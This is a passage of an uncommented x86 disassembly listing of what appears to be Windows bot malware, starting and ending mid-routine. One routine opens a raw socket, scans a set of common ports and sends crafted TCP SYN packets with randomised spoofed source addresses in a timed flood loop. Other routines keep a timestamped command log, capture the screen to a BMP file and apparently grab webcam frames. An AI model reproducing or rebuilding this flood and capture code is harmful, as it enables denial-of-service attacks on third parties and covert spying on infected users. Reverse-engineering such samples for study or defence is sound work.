jz short loc_415692
loc_4156B8: ; CODE XREF: sub_4155FE+A7�j
lea eax, [ebp+arg_0]
mov [ebp+arg_0], 4
push eax
lea eax, [ebp+var_4]
push eax
push 1007h
push 0FFFFh
push esi
call ds:dword_4F6530 ; getsockopt
cmp eax, edi
jz short loc_415692
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
loc_4156E3: ; CODE XREF: sub_4155FE+24�j
; sub_4155FE+8B�j ...
pop edi
pop esi
leave
retn
sub_4155FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4156E7 proc near ; CODE XREF: sub_41554A+51�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = dword ptr -98h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push ebx
push ebx
push 0FFh
push 3
push 2
mov [ebp+var_14], esi
call ds:dword_4F6550 ; WSASocketA
lea ecx, [ebp+var_14]
push 4
push ecx
push 2
push ebx
push eax
mov dword_4E7A88, eax
call dword_4E4200 ; setsockopt
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+var_100]
pop ecx
mov [ebp+var_10C], ebx
mov [ebp+var_7C], ecx
mov [ebp+var_108], ebx
mov [ebp+var_104], ebx
mov [ebp+var_8C], 401h
mov [ebp+var_88], 15h
mov [ebp+var_84], 16h
mov [ebp+var_80], 17h
mov [ebp+var_78], 35h
mov [ebp+var_74], 50h
mov [ebp+var_70], 51h
mov [ebp+var_6C], 58h
mov [ebp+var_68], 6Eh
mov [ebp+var_64], 71h
mov [ebp+var_60], 77h
mov [ebp+var_5C], 87h
mov [ebp+var_58], 89h
mov [ebp+var_54], 8Bh
mov [ebp+var_50], 8Fh
mov [ebp+var_4C], 1BBh
mov [ebp+var_48], 1BDh
mov [ebp+var_44], 400h
mov [ebp+var_40], 599h
mov [ebp+var_3C], 5DCh
mov [ebp+var_38], 6B8h
mov [ebp+var_34], 0CEAh
mov [ebp+var_30], 0D3Dh
mov [ebp+var_2C], 1388h
mov [ebp+var_28], 1A0Bh
mov [ebp+var_24], 1F40h
mov [ebp+var_20], 1F90h
rep stosd
mov [ebp+var_10], ebx
mov [ebp+var_1C], 3
mov [ebp+var_18], 0BB8h
mov [ebp+var_4], ebx
loc_41582B: ; CODE XREF: sub_4156E7+1BE�j
mov eax, [ebp+arg_0]
mov [ebp+var_9C], 2
mov [ebp+var_98], eax
mov eax, [ebp+var_4]
lea edi, [ebp+eax+var_8C]
mov ax, word ptr [ebp+eax+var_8C]
push eax
call dword_4E4220 ; htons
push ebx
push esi
push 2
mov [ebp+var_9A], ax
call dword_4E42A0 ; socket
lea ecx, [ebp+var_1C]
mov [ebp+var_C], eax
push ecx
lea ecx, [ebp+var_9C]
push 10h
push ecx
push eax
call sub_4155FE
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call dword_4E42B8 ; closesocket
cmp [ebp+var_8], ebx
jnz short loc_41589D
mov ecx, [ebp+var_4]
mov eax, [edi]
mov [ebp+ecx+var_10C], eax
loc_41589D: ; CODE XREF: sub_4156E7+1A8�j
add [ebp+var_4], 4
cmp [ebp+var_4], 70h
jl short loc_41582B
mov esi, offset byte_4E7A8C
push offset asc_44E270 ; " "
push esi ; Dest
call _sprintf
mov edi, ds:dword_4F63B0
pop ecx
pop ecx
call edi ; GetTickCount
mov [ebp+var_C], eax
lea eax, [ebp+var_10C]
mov [ebp+var_4], ebx
mov [ebp+var_8], eax
loc_4158D0: ; CODE XREF: sub_4156E7+23F�j
call edi ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_415928
mov eax, [ebp+var_8]
mov eax, [eax]
cmp eax, ebx
jz short loc_415901
push eax
push esi
push offset aSD ; "%s%d "
push esi ; Dest
mov [ebp+var_10], eax
call _sprintf
add esp, 10h
jmp short loc_41591B
; ---------------------------------------------------------------------------
loc_415901: ; CODE XREF: sub_4156E7+203�j
push 0FFFFh
push ebx
call sub_419589
pop ecx
pop ecx
push eax
call dword_4E4220 ; htons
movzx eax, ax
mov [ebp+var_10], eax
loc_41591B: ; CODE XREF: sub_4156E7+218�j
inc [ebp+var_4]
add [ebp+var_8], 4
cmp [ebp+var_4], 1Ch
jl short loc_4158D0
loc_415928: ; CODE XREF: sub_4156E7+1FA�j
; sub_4156E7+46B�j
push 28h ; Size
push ebx ; Val
push offset byte_4E7A28 ; Dst
call _memset
mov esi, 0FFFFh
mov byte_4E7A28, 45h
push esi
push 400h
mov byte_4E7A31, 6
mov byte_4E7A29, 8
call sub_419589
add esp, 14h
push eax
call dword_4E4220 ; htons
push 28h
mov word_4E7A2C, ax
call dword_4E4220 ; htons
or byte_4E7A30, 0FFh
cmp dword_4E7A18, ebx
mov word_4E7A2A, ax
mov word_4E7A2E, bx
jnz short loc_415999
push [ebp+arg_0]
call sub_415B61
pop ecx
jmp short loc_4159A4
; ---------------------------------------------------------------------------
loc_415999: ; CODE XREF: sub_4156E7+2A5�j
push offset byte_4E73F8
call dword_4E4260 ; inet_addr
loc_4159A4: ; CODE XREF: sub_4156E7+2B0�j
mov dword_4E7A34, eax
mov eax, [ebp+arg_0]
push 4000h
mov dword_4E7A38, eax
mov byte_4E7A49, bl
call dword_4E4220 ; htons
push esi
push ebx
mov word_4E7A4A, ax
call sub_419589
mov edi, eax
push esi
push ebx
shl edi, 8
call sub_419589
add esp, 10h
add edi, eax
push edi
call dword_4E421C ; htonl
mov dword_4E7A40, eax
mov al, byte_4E7A48
mov edi, [ebp+arg_0]
and al, 0Fh
or al, 50h
push 14h
mov byte_4E7A48, al
mov ax, word ptr [ebp+var_10]
mov dword_4E7A44, ebx
mov word_4E7A4E, bx
mov word_4E7A3E, ax
mov dword_4E7A64, edi
mov byte_4E7A68, bl
mov byte_4E7A69, 6
call dword_4E4220 ; htons
mov word_4E7A6A, ax
mov ax, word_4E7A3E
mov word_4E7A50, 2
mov dword_4E7A54, edi
mov word_4E7A52, ax
mov [ebp+var_4], ebx
jmp short loc_415A5A
; ---------------------------------------------------------------------------
loc_415A55: ; CODE XREF: sub_4156E7+445�j
mov esi, 0FFFFh
loc_415A5A: ; CODE XREF: sub_4156E7+36C�j
cmp [ebp+var_4], ebx
jnz short loc_415A8E
push esi
push ebx
call sub_419589
pop ecx
pop ecx
push eax
call dword_4E4220 ; htons
mov word_4E7A3C, ax
mov eax, dword_4E7A34
mov dword_4E7A60, eax
mov byte_4E7A49, 2
mov dword_4E7A44, ebx
jmp short loc_415AAD
; ---------------------------------------------------------------------------
loc_415A8E: ; CODE XREF: sub_4156E7+376�j
push esi
push ebx
mov byte_4E7A49, 10h
call sub_419589
pop ecx
pop ecx
push eax
call dword_4E4220 ; htons
movzx eax, ax
mov dword_4E7A44, eax
loc_415AAD: ; CODE XREF: sub_4156E7+3A5�j
inc word_4E7A2C
inc dword_4E7A40
mov ax, word_4E7A3E
push 5
pop ecx
mov esi, offset word_4E7A3C
mov edi, offset dword_4E7A6C
mov word_4E7A32, bx
mov word_4E7A4C, bx
push 14h
rep movsd
mov esi, offset byte_4E7A28
mov word_4E7A52, ax
push esi
call sub_40B002
push 20h
push offset dword_4E7A60
mov word_4E7A32, ax
call sub_40B002
add esp, 10h
mov word_4E7A4C, ax
push 10h
push offset word_4E7A50
push ebx
push 28h
push esi
push dword_4E7A88
call dword_4E4284 ; sendto
inc [ebp+var_4]
cmp [ebp+var_4], 3FFh
jl loc_415A55
call ds:dword_4F63B0 ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_415B57
push [ebp+arg_8]
call ds:dword_4F6380 ; Sleep
jmp loc_415928
; ---------------------------------------------------------------------------
loc_415B57: ; CODE XREF: sub_4156E7+460�j
pop edi
pop esi
mov eax, offset byte_4E7A8C
pop ebx
leave
retn
sub_4156E7 endp
; =============== S U B R O U T I N E =======================================
sub_415B61 proc near ; CODE XREF: sub_4156E7+2AA�p
arg_0 = dword ptr 4
push 0FFFEh
push 1
call sub_419589
pop ecx
pop ecx
mov ecx, [esp+arg_0]
shl eax, 10h
and ecx, 0FFFFh
or eax, ecx
retn
sub_415B61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415B7F(char *Str2,int)
sub_415B7F proc near ; CODE XREF: sub_401CC7+7367�p
var_4 = dword ptr -4
Str2 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_4563A8
mov edi, 0B8h
loc_415B93: ; CODE XREF: sub_415B7F+33�j
cmp byte ptr [esi], 0
jz short loc_415BB6
push [ebp+Str2] ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_415BB6
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_456F28
jl short loc_415B93
jmp short loc_415BF8
; ---------------------------------------------------------------------------
loc_415BB6: ; CODE XREF: sub_415B7F+17�j
; sub_415B7F+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi ; Size
push 0 ; Val
lea ebx, dword_4563A8[esi]
push ebx ; Dst
call _memset
push 17h ; Count
push [ebp+Str2] ; Source
push ebx ; Dest
call _strncpy
push 9Fh ; Count
lea eax, dword_4563C0[esi]
push [ebp+arg_4] ; Source
push eax ; Dest
call _strncpy
add esp, 24h
inc dword_440498
pop ebx
loc_415BF8: ; CODE XREF: sub_415B7F+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_415B7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415BFF(int,char *Str,int)
sub_415BFF proc near ; CODE XREF: sub_401CC7+28D2�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push offset dword_44E27C ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
xor edi, edi
mov esi, offset dword_4563A8
loc_415C29: ; CODE XREF: sub_415BFF+72�j
cmp byte ptr [esi], 0
jz short loc_415C64
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_ ; "%d. "
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 2Ch
loc_415C64: ; CODE XREF: sub_415BFF+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_456F28
jl short loc_415C29
pop edi
pop esi
leave
retn
sub_415BFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415C77 proc near ; CODE XREF: WinMain(x,x,x,x)+384�p
; WinMain(x,x,x,x)+408�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_4F6438 ; GetLocalTime
mov ebx, offset byte_4EBE90
mov edi, 80h
mov esi, offset byte_4E7E90
loc_415C99: ; CODE XREF: sub_415C77+3D�j
cmp byte ptr [ebx], 0
jz short loc_415CB0
push 7Fh ; Count
lea eax, [ebx+80h]
push ebx ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_415CB0: ; CODE XREF: sub_415C77+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_415C99
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_415C77 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415CEB(char *Format,char Args)
sub_415CEB proc near ; CODE XREF: sub_4019E7+F7�p
; sub_401CC7:loc_408DB7�p ...
Dest = byte ptr -80h
Format = dword ptr 8
Args = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+Args]
push eax ; Args
lea eax, [ebp+Dest]
push [ebp+Format] ; Format
push 80h ; Count
push eax ; Dest
call __vsnprintf
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 14h
leave
retn
sub_415CEB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+14h], ebx
push esi
mov dword ptr [ebp-8], 80h
mov [ebp-4], ebx
jnz short loc_415D46
push ebx
push dword ptr [ebp+10h]
push offset dword_44E2C8
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_409D6C
add esp, 14h
loc_415D46: ; CODE XREF: .text:00415D2D�j
cmp [ebp+18h], ebx
jz short loc_415D5E
push dword ptr [ebp+18h]
call _atoi
cmp eax, ebx
pop ecx
mov [ebp-4], eax
jz short loc_415D5E
mov [ebp-8], eax
loc_415D5E: ; CODE XREF: .text:00415D49�j
; .text:00415D59�j
mov [ebp+14h], ebx
mov esi, offset byte_4E7E90
loc_415D66: ; CODE XREF: .text:00415DAE�j
mov eax, [ebp+14h]
cmp eax, [ebp-8]
jge short loc_415DB0
cmp [esi], bl
jz short loc_415D9F
cmp [ebp+18h], ebx
jz short loc_415D8B
cmp [ebp-4], ebx
jnz short loc_415D8B
push dword ptr [ebp+18h]
push esi
call sub_418DD7
pop ecx
test eax, eax
pop ecx
jz short loc_415D9F
loc_415D8B: ; CODE XREF: .text:00415D75�j
; .text:00415D7A�j
push 1
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_409D6C
add esp, 14h
loc_415D9F: ; CODE XREF: .text:00415D70�j
; .text:00415D89�j
inc dword ptr [ebp+14h]
add esi, 80h
cmp esi, offset byte_4EBE90
jl short loc_415D66
loc_415DB0: ; CODE XREF: .text:00415D6C�j
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_415DB4(int,char *Str,int,int)
sub_415DB4 proc near ; CODE XREF: sub_401CC7+27C6�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset byte_4E7E90
xor ecx, ecx
loc_415DBB: ; CODE XREF: sub_415DB4+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset byte_4EBE90
jl short loc_415DBB
cmp [esp+arg_C], ecx
jnz short loc_415DE9
push ecx ; int
push [esp+4+arg_8] ; int
push offset dword_44E2D4 ; int
push [esp+0Ch+Str] ; Str
push [esp+10h+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_415DE9: ; CODE XREF: sub_415DB4+19�j
push offset dword_44E2E8
call sub_415C77
pop ecx
retn
sub_415DB4 endp
; ---------------------------------------------------------------------------
push esi
mov esi, offset byte_4E7E90
loc_415DFB: ; CODE XREF: .text:00415E1C�j
cmp byte ptr [esi], 0
jz short loc_415E10
push dword ptr [esp+8]
push esi
call sub_418DD7
pop ecx
test eax, eax
pop ecx
jnz short loc_415E22
loc_415E10: ; CODE XREF: .text:00415DFE�j
add esi, 80h
cmp esi, offset byte_4EBE90
jl short loc_415DFB
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_415E22: ; CODE XREF: .text:00415E0E�j
push 1
pop eax
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E27 proc near ; DATA XREF: sub_401CC7+287C�o
Dest = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
Str = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_415E7A
push edx ; int
lea eax, [ebp+var_118]
push [ebp+var_14] ; int
push offset dword_44E2FC ; int
push eax ; Str
push [ebp+var_11C] ; int
call sub_409D6C
add esp, 14h
loc_415E7A: ; CODE XREF: sub_415E27+33�j
cmp [ebp+Str], 0
jz short loc_415E9A
lea eax, [ebp+Str]
push eax ; Str
call _atoi
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_415E9A
mov [ebp+var_8], eax
loc_415E9A: ; CODE XREF: sub_415E27+5A�j
; sub_415E27+6E�j
and [ebp+arg_0], 0
mov esi, offset byte_4E7E90
loc_415EA3: ; CODE XREF: sub_415E27+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_415EFD
cmp byte ptr [esi], 0
jz short loc_415EEC
cmp [ebp+Str], 0
jz short loc_415ED2
cmp [ebp+var_4], 0
jnz short loc_415ED2
lea eax, [ebp+Str]
push eax ; int
push esi ; Str
call sub_418DD7
pop ecx
test eax, eax
pop ecx
jz short loc_415EEC
loc_415ED2: ; CODE XREF: sub_415E27+90�j
; sub_415E27+96�j
push edi ; int
lea eax, [ebp+var_118]
push [ebp+var_14] ; int
push esi ; int
push eax ; Str
push [ebp+var_11C] ; int
call sub_409D6C
add esp, 14h
loc_415EEC: ; CODE XREF: sub_415E27+87�j
; sub_415E27+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset byte_4EBE90
jl short loc_415EA3
loc_415EFD: ; CODE XREF: sub_415E27+82�j
lea eax, [ebp+Dest]
push offset asc_44E318 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_415F37
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+var_118]
push eax ; Str
push [ebp+var_11C] ; int
call sub_409D6C
add esp, 14h
loc_415F37: ; CODE XREF: sub_415E27+EE�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_18]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_415E27 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F56 proc near ; CODE XREF: sub_401CC7+74A5�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 484h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call dword_4E420C ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+var_20], edi
jz loc_41618A
push 8
push edi
call dword_4E4228 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+var_8], eax
call dword_4E4228 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+var_C], eax
call dword_4E4228 ; GetDeviceCaps
cmp eax, 8
mov [ebp+var_10], eax
ja short loc_415FB8
push 18h
push edi
call dword_4E4228 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_415FBA
; ---------------------------------------------------------------------------
loc_415FB8: ; CODE XREF: sub_415F56+50�j
xor ebx, ebx
loc_415FBA: ; CODE XREF: sub_415F56+60�j
push edi
call dword_4E426C ; CreateCompatibleDC
cmp eax, esi
mov [ebp+var_4], eax
jz loc_41616F
mov eax, [ebp+var_8]
push esi
mov [ebp+var_80], eax
mov eax, [ebp+var_C]
mov [ebp+var_7C], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_76], ax
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_84]
push 1
push eax
push edi
mov [ebp+var_84], 28h
mov [ebp+var_78], 1
mov [ebp+var_74], esi
mov [ebp+var_70], esi
mov [ebp+var_6C], esi
mov [ebp+var_68], esi
mov [ebp+var_64], ebx
mov [ebp+var_60], ebx
call dword_4E4264 ; CreateDIBSection
cmp eax, esi
mov [ebp+var_1C], eax
jz loc_41617A
push eax
push [ebp+var_4]
call dword_4E40F0 ; SelectObject
cmp eax, esi
jz loc_41617A
cmp eax, 0FFFFFFFFh
jz loc_41617A
push 0CC0020h
push esi
push esi
push edi
push [ebp+var_C]
push [ebp+var_8]
push esi
push esi
push [ebp+var_4]
call dword_4E4268 ; BitBlt
test eax, eax
jz loc_41617A
cmp ebx, esi
jz short loc_416077
lea eax, [ebp+var_484]
push eax
push ebx
push esi
push [ebp+var_4]
call dword_4E4144 ; GetDIBColorTable
mov ebx, eax
loc_416077: ; CODE XREF: sub_415F56+10B�j
mov edi, [ebp+var_10]
mov ecx, [ebp+var_8]
imul edi, [ebp+var_C]
imul edi, ecx
mov eax, ebx
push esi
shr edi, 3
shl eax, 2
mov [ebp+var_8], eax
push 80h
lea edx, [eax+edi+36h]
add eax, 36h
push 2
mov [ebp+var_26], eax
mov eax, [ebp+var_C]
push esi
push esi
push 40000000h
push [ebp+arg_0]
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_30], 4D42h
mov [ebp+var_2E], edx
mov [ebp+var_2A], si
mov [ebp+var_28], si
mov [ebp+var_58], 28h
mov [ebp+var_54], ecx
mov [ebp+var_4C], 1
mov [ebp+var_4A], ax
mov [ebp+var_48], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], esi
mov [ebp+var_38], ebx
mov [ebp+var_34], esi
call ds:dword_4F63F4 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_41615A
lea ecx, [ebp+var_14]
push esi
push ecx
lea ecx, [ebp+var_30]
push 0Eh
push ecx
push eax
call ds:dword_4F63E8 ; WriteFile
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_58]
push 28h
push eax
push [ebp+arg_0]
call ds:dword_4F63E8 ; WriteFile
cmp ebx, esi
jz short loc_41613C
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_484]
push [ebp+var_8]
push eax
push [ebp+arg_0]
call ds:dword_4F63E8 ; WriteFile
loc_41613C: ; CODE XREF: sub_415F56+1CC�j
lea eax, [ebp+var_14]
push esi
push eax
push edi
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_4F63E8 ; WriteFile
push [ebp+arg_0]
call ds:dword_4F6370 ; CloseHandle
push 1
pop esi
loc_41615A: ; CODE XREF: sub_415F56+1A2�j
push [ebp+var_1C]
call dword_4E417C ; DeleteObject
push [ebp+var_4]
call dword_4E40DC ; DeleteDC
mov edi, [ebp+var_20]
loc_41616F: ; CODE XREF: sub_415F56+70�j
push edi
call dword_4E40DC ; DeleteDC
mov eax, esi
jmp short loc_41618C
; ---------------------------------------------------------------------------
loc_41617A: ; CODE XREF: sub_415F56+C7�j
; sub_415F56+D9�j ...
push edi
call dword_4E40DC ; DeleteDC
push [ebp+var_4]
call dword_4E40DC ; DeleteDC
loc_41618A: ; CODE XREF: sub_415F56+23�j
xor eax, eax
loc_41618C: ; CODE XREF: sub_415F56+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_415F56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416191(int,size_t Size,int,int)
sub_416191 proc near ; CODE XREF: sub_401CC7+75DB�p
var_34 = byte ptr -34h
var_20 = dword ptr -20h
Memory = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push dword_4EBE94
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call dword_4E4170
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_4161CF
mov eax, esi
jmp loc_416385
; ---------------------------------------------------------------------------
loc_4161CF: ; CODE XREF: sub_416191+35�j
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_4161EC
push ebx
push [ebp+Size]
push 40Ah
push edi
call dword_4E427C ; SendMessageA
jmp short loc_4161EE
; ---------------------------------------------------------------------------
loc_4161EC: ; CODE XREF: sub_416191+47�j
xor eax, eax
loc_4161EE: ; CODE XREF: sub_416191+59�j
cmp eax, ebx
jnz short loc_4161F9
loc_4161F2: ; CODE XREF: sub_416191+88�j
; sub_416191+BC�j
mov ebx, esi
jmp loc_41637A
; ---------------------------------------------------------------------------
loc_4161F9: ; CODE XREF: sub_416191+5F�j
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_416216
lea eax, [ebp+var_34]
push eax
push 2Ch
push 40Eh
push edi
call dword_4E427C ; SendMessageA
loc_416216: ; CODE XREF: sub_416191+71�j
cmp [ebp+var_20], ebx
jz short loc_4161F2
push edi
call dword_4E41C0 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_41623C
push ebx
push ebx
push edi
push [ebp+var_4]
call dword_4E427C ; SendMessageA
mov [ebp+Size], eax
jmp short loc_41623F
; ---------------------------------------------------------------------------
loc_41623C: ; CODE XREF: sub_416191+98�j
mov [ebp+Size], ebx
loc_41623F: ; CODE XREF: sub_416191+A9�j
push [ebp+Size] ; Size
call _malloc
cmp eax, ebx
pop ecx
mov [ebp+Memory], eax
jz short loc_4161F2
push [ebp+Size] ; Size
call _malloc
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_416266
push 1
pop ebx
jmp loc_41637A
; ---------------------------------------------------------------------------
loc_416266: ; CODE XREF: sub_416191+CB�j
push [ebp+var_4]
call dword_4E41C0 ; IsWindow
test eax, eax
jz short loc_416283
push [ebp+Memory]
push [ebp+Size]
push edi
push [ebp+var_4]
call dword_4E427C ; SendMessageA
loc_416283: ; CODE XREF: sub_416191+E0�j
push [ebp+Size] ; Size
push [ebp+Memory] ; Src
push esi ; Dst
call _memcpy
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_41629E
mov ecx, 280h
loc_41629E: ; CODE XREF: sub_416191+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_4162AA
mov eax, 1E0h
loc_4162AA: ; CODE XREF: sub_416191+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call dword_4E41C0 ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_4162F4
push esi
push [ebp+Size]
push edi
push [ebp+var_4]
call dword_4E427C ; SendMessageA
loc_4162F4: ; CODE XREF: sub_416191+153�j
push [ebp+var_4]
call dword_4E41C0 ; IsWindow
test eax, eax
